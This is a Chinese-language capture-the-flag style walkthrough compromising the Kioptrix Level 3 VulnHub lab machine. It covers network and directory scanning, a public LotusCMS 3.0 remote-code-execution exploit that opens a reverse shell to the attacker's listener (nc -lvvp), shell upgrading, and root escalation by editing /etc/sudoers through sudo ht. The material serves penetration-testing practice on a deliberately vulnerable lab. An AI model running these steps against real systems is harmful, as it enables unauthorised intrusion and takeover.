项目地址
https://download.vulnhub.com/kioptrix/KVM3.rar
实验过程
将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机
使用nmap进行主机发现,获取靶机ip和端口
nmap 192.168.47.0-254
根据对比可知Kioptrix的ip地址为192.168.47.160,开放了22,80端口
访问网站
四处翻翻
发现一个登录界面且该网站cms为:LotusCMS
不知道账号密码
扫描目录看看
dirb http://192.168.47.160
尝试访问
http://192.168.47.160/modules/
http://192.168.47.160/phpmyadmin/
暂时没啥可用信息
使用searchsploit搜索LotusCMS的历史漏洞,发现该CMS版本为3.0时存在命令执行漏洞
searchsploit LotusCMS
漏洞利用
一个python版本的exp:GitHub - nguyen-ngo/LotusCMS-3.0-RCE-exploit
构造payload反弹shell
python a.py -rh 192.168.47.160 -rp 80 -lh 192.168.47.129
kali开启监听
nc -lvvp 444
监听成功
查看权限,普通用户
获得交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
提权
查看靶机内核版本信息和发行版本信息
uname -a
cat /etc/*-release
使用searchsploit查找符合内核版本和发行版本的历史漏洞
searchsploit Ubuntu
查看/etc/passwd,有利用漏洞
查看家目录
发现有两个文件
查看readme文件,发现有个可用命令
先登录loneferret账户(sqlmap爆破密码)starwars
直接执行 sudo ht不行,看看可以执行什么
export TERM=xterm
再次执行sudo ht
F3查找 /etc/sudoers 然后在loneferrt后加,/bin/bash
F2保存
F10退出
执行/bin/bash提权
sudo /bin/bash
提权成功